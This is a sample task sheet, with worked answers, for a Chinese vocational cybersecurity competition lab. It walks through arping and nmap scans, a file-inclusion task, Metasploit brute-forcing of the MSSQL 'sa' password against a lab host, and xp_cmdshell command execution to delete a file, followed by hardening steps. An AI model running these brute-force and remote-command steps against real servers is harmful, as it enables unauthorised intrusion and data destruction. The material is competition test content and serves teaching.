2018年度全国职业技能大赛中职组“网络空间安全”赛项江苏省竞赛任务书（样题）一、竞赛时间9:00-12:00，共计3小时。

二、竞赛阶段简介三、竞赛任务书内容（一）拓扑图（二）第一阶段任务书任务1.ARP扫描渗透测试任务环境说明：✓服务器场景：CentOS5.5✓服务器场景操作系统：CentOS5.51.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具arping，发送请求数据包数量为5个），并将该操作使用命令中固定不变的字符串作为Flag提交；Arping –c 5 x.x.x.x2.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具arping，发送请求数据包数量为5个），并将该操作结果的最后1行，从左边数第2个数字作为Flag提交；Arping –c 5 x.x.x.xroot@kali:~# arping -c 5 192.168.28.122ARPING 192.168.28.122 from 192.168.28.100 eth0Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.017ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 0.638ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.051ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.590ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.051ms Sent 5 probes (1 broadcast(s))Received 5 response(s)Flag:53.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具Metasploit中arp_sweep模块），并将工具Metasploit 中arp_sweep模块存放路径字符串作为Flag（形式：字符串1/字符串2/字符串3/…/字符串n）提交；msf > use auxiliary/scanner/discovery/arp_sweepFlag:Auxiliary/scanner/discovery/arp_sweep4.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具Metasploit中arp_sweep模块），假设目标服务器场景CentOS5.5在线，请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交；msf > use auxiliary/scanner/discovery/arp_sweepmsf auxiliary(arp_sweep) > run[*] 192.168.28.122 appears to be up (VMware, Inc.).[*] 192.168.28.2 appears to be up (VMware, Inc.).[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedFlag:completed5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具Metasploit中arp_sweep模块），假设目标服务器场景CentOS5.5在线，请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交；msf auxiliary(arp_sweep) > run[*] 192.168.28.122 appears to be up (VMware, Inc.).[*] 192.168.28.2 appears to be up (VMware, Inc.).[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedFlag:appears6.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具Metasploit中arp_sweep模块），假设目标服务器场景CentOS5.5在线，请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交；Flag:exploit or run任务2.操作系统及应用程序扫描渗透测试任务环境说明：✓服务器场景：CentOS5.5✓服务器场景操作系统：CentOS5.51.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试（使用工具nmap，使用参数n，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；Flag:Nmap –n –Sp x.x.x.x2.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试（使用工具nmap），并将该操作显示结果的上数第3行左数第3个单词作为Flag提交；root@kali:~# nmap -n -sP 192.168.28.122Starting Nmap 7.40 ( https:// ) at 2017-12-10 19:59 EST Nmap scan report for 192.168.28.122Host is up (0.00069s latency).Nmap done: 1 IP address (1 host up) scanned in 0.09 secondsFlag:up3.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试（使用工具nmap，使用参数n，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；root@kali:~# nmap -n -A 192.168.28.122Starting Nmap 7.40 ( https:// ) at 2017-12-10 20:11 EST Nmap scan report for 192.168.28.122Host is up (0.00025s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)| ssh-hostkey:| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA)|_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA) 111/tcp open rpcbind 2 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1 910/udp status|_ 100024 1 913/tcp statusMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 - 2.6.30Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.25 ms 192.168.28.122OS and Service detection performed. Please report any incorrect results at https:///submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.22 secondsFlag:Nmap –n –A x.x.x.x4.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试（使用工具nmap，使用参数n，使用必须要使用的参数），并将该操作显示结果的最后1行最后1个单词作为Flag提交；root@kali:~# nmap -n -A 192.168.28.122Starting Nmap 7.40 ( https:// ) at 2017-12-10 20:11 EST Nmap scan report for 192.168.28.122Host is up (0.00025s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)| ssh-hostkey:| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA) |_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA) 111/tcp open rpcbind 2 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1 910/udp status|_ 100024 1 913/tcp statusMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 - 2.6.30Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.25 ms 192.168.28.122OS and Service detection performed. Please report any incorrect results at https:///submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.22 secondsFlag:seconds5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗透测试（使用工具nmap，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；root@kali:~# nmap -O 192.168.28.122Starting Nmap 7.40 ( https:// ) at 2017-12-10 20:13 EST Nmap scan report for 192.168.28.122Host is up (0.00044s latency).Not shown: 998 closed portsPORT STATE SERVICE22/tcp open ssh111/tcp open rpcbindMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 - 2.6.30Network Distance: 1 hopOS detection performed. Please report any incorrect results at https:///submit/ .Nmap done: 1 IP address (1 host up) scanned in 14.80 seconds Flag:Nmap –O x.x.x.x6.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试（使用工具nmap，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；Flag:Nmap –sV x.x.x.x7.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试（使用工具nmap，使用必须要使用的参数），并将该操作显示结果的SSH服务版本信息字符串作为Flag提交；root@kali:~# nmap -sV 192.168.28.122Starting Nmap 7.40 ( https:// ) at 2017-12-10 20:17 EST Nmap scan report for 192.168.28.122Host is up (0.00014s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)111/tcp open rpcbind 2 (RPC #100000)MAC Address: 00:0C:29:62:80:73 (VMware)Service detection performed. Please report any incorrect results at https:///submit/ .Nmap done: 1 IP address (1 host up) scanned in 19.60 secondsFlag:OpenSSH 4.3任务3.Web应用程序文件包含安全攻防任务环境说明：✓服务器场景名称：WebServ2003✓服务器场景安全操作系统：Microsoft Windows2003 Server✓服务器场景安装中间件：Apache2.2；✓服务器场景安装Web开发环境：Php6；✓服务器场景安装数据库：Microsoft SqlServer2000；✓服务器场景安装文本编辑器：EditPlus；1.访问WebServ2003服务器场景，"/"->"Display Uploaded's FileContent"，分析该页面源程序，找到提交的变量名，并将该变量名作为Flag（形式：name=“变量名”）提交；2.对该任务题目1页面注入点进行渗透测试，通过php://filter协议使当前页面以Base64编码方式回显WebServ2003服务器场景访问日志文件：AppServ/Apache2.2/logs/flag.log的内容，并将注入语句作为Flag提交；3.对该任务题目2页面注入点进行注入以后，将当前页面以Base64编码方式回显内容作为Flag提交；4.通过PHP函数对题目3中Base64编码回显内容进行解码，并将解码内容作为Flag提交；5.进入WebServ2003服务器场景的目录，找到DisplayFileCtrl.php文件，使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值，使之可以抵御文件包含渗透测试，并提交Flag（形式：F1|F2|F3|F4）；6.再次对该任务题目1页面注入点进行渗透测试，验证此次利用该注入点对WebServ2003服务器场景进行文件包含渗透测试无效，并将回显页面源文件内容作为Flag提交；任务4.数据库安全加固任务环境说明：✓服务器场景名称：WebServ2003✓服务器场景安全操作系统：Microsoft Windows2003 Server✓服务器场景安装中间件：Apache2.2；✓服务器场景安装Web开发环境：Php6；✓服务器场景安装数据库：Microsoft SqlServer2000；✓服务器场景安装文本编辑器：EditPlus；1.对服务器场景WebServ2003安装补丁，使其中的数据库MicrosoftSqlServer2000能够支持远程连接，并将补丁包程序所在目录名称作为Flag提交；2.对服务器场景WebServ2003安装补丁，使其中的数据库MicrosoftSqlServer2000能够支持远程连接，在安装补丁后的服务器场景中运行netstat–an命令，将回显的数据库服务连接状态作为Flag提交；C:\Documents and Settings\Administrator>netstat -anActive ConnectionsProto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING TCP 192.168.28.131:139 0.0.0.0:0 LISTENING UDP 0.0.0.0:445 *:*UDP 0.0.0.0:500 *:*UDP 0.0.0.0:1434 *:*UDP 0.0.0.0:4500 *:*UDP 127.0.0.1:123 *:*UDP 192.168.28.131:123 *:*UDP 192.168.28.131:137 *:*UDP 192.168.28.131:138 *:*Flag:LISTENING3.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试，并将扫描结果作为Flag提交；msf > use auxiliary/scanner/mssql/mssql_pingmsf auxiliary(mssql_ping) > run[*] 192.168.28.131: - SQL Server information for192.168.28.131:[+] 192.168.28.131: - ServerName = SERVER[+] 192.168.28.131: - InstanceName = MSSQLSERVER[+] 192.168.28.131: - IsClustered = No[+] 192.168.28.131: - Version = 8.00.194[+] 192.168.28.131: - tcp = 1433[+] 192.168.28.131: - np =\\SERVER\pipe\sql\query[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed4.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令暴力破解（使用PC2中的渗透测试平台中的字典文件superdic.txt），并将破解结果中的最后一个字符串作为Flag提交；msf > use auxiliary/scanner/mssql/mssql_loginmsf auxiliary(mssql_login) > set username samsf auxiliary(mssql_login) > set pass_file/usr/share/wordlists/metasploit/password.lstmsf auxiliary(mssql_login) > run[*] 192.168.28.131:1433 - 192.168.28.131:1433 - MSSQL - Starting authentication scanner.[!] 192.168.28.131:1433 - No active DB -- Credential data will not be saved![-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$% (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^ (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^& (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^&* (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!boerbul (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!boerseun (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!gatvol (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!hotnot (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!kak (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!koedoe (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!likable (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!poes (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!pomp (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!soutpiel (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:.net (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:000000 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:00000000 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0007 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:007 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:007007 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0s (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0th (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1 (Incorrect: )WORKSTATION\sa:10 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:100 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1000 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1000s (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:100s (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1022 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:10s (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:10sne1 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1111 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:11111 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:111111 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:11111111 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:112233 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1212 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:121212 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1213 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1214 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1225 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:123 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:123123 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:123321 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1234 (Incorrect: )WORKSTATION\sa:12345 (Incorrect: )[+] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN SUCCESSFUL: WORKSTATION\sa:123456[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedFlag: completed5.通过PC2中de1渗透测试平台对服务器场景WebServ2003进行数据库服务扩展存储过程进行利用，删除WebServ2003服务器场景C:\1.txt，并将渗透测试利用命令以及渗透测试平台run结果第1行回显作为Flag提交；msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec msf auxiliary(mssql_exec) > set rhost 192.168.28.131msf auxiliary(mssql_exec) > set password 123456msf auxiliary(mssql_exec) > set cmd cmd.exe /c del "C:\\1.txt"msf auxiliary(mssql_exec) > run[*] 192.168.28.131:1433 - SQL Query: EXEC master..xp_cmdshell'cmd.exe /c del C:\1.txt'output------[*] Auxiliary module execution completedFlag: [*] 192.168.28.131:1433 - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c del C:\1.txt'6.通过对服务器场景WebServ2003的数据库服务进行安全加固，阻止PC2中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试，并将加固身份验证选项中的最后一个字符串作为Flag提交：W7.验证在WebServ2003的数据库服务进行安全加固后，再次通过PC2中渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令进行暴力破解（使用PC2中的渗透测试平台中的字典文件superdic.txt），并将破解结果的从上向下数第3行内容作为Flag提交；msf auxiliary(mssql_login) > run[*] 192.168.28.131:1433 - 192.168.28.131:1433 - MSSQL - Starting authentication scanner.[!] 192.168.28.131:1433 - No active DB -- Credential data will not be saved![-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$% (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^ (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^& (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^&* (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!boerbul (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!boerseun (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!gatvol (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!hotnot (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!kak (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!koedoe (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!likable (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!poes (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!pomp (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!soutpiel (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:.net (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:000000 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:00000000 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0007 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:007 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:007007 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0s (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0th (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:10 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:100 (Incorrect: )[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1000 (Incorrect: )[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed（三）第二阶段任务书假定各位选手是某企业信息安全工程师，负责服务器的维护，其中某服务器可能存在着各种问题和漏洞（见以下漏洞列表）。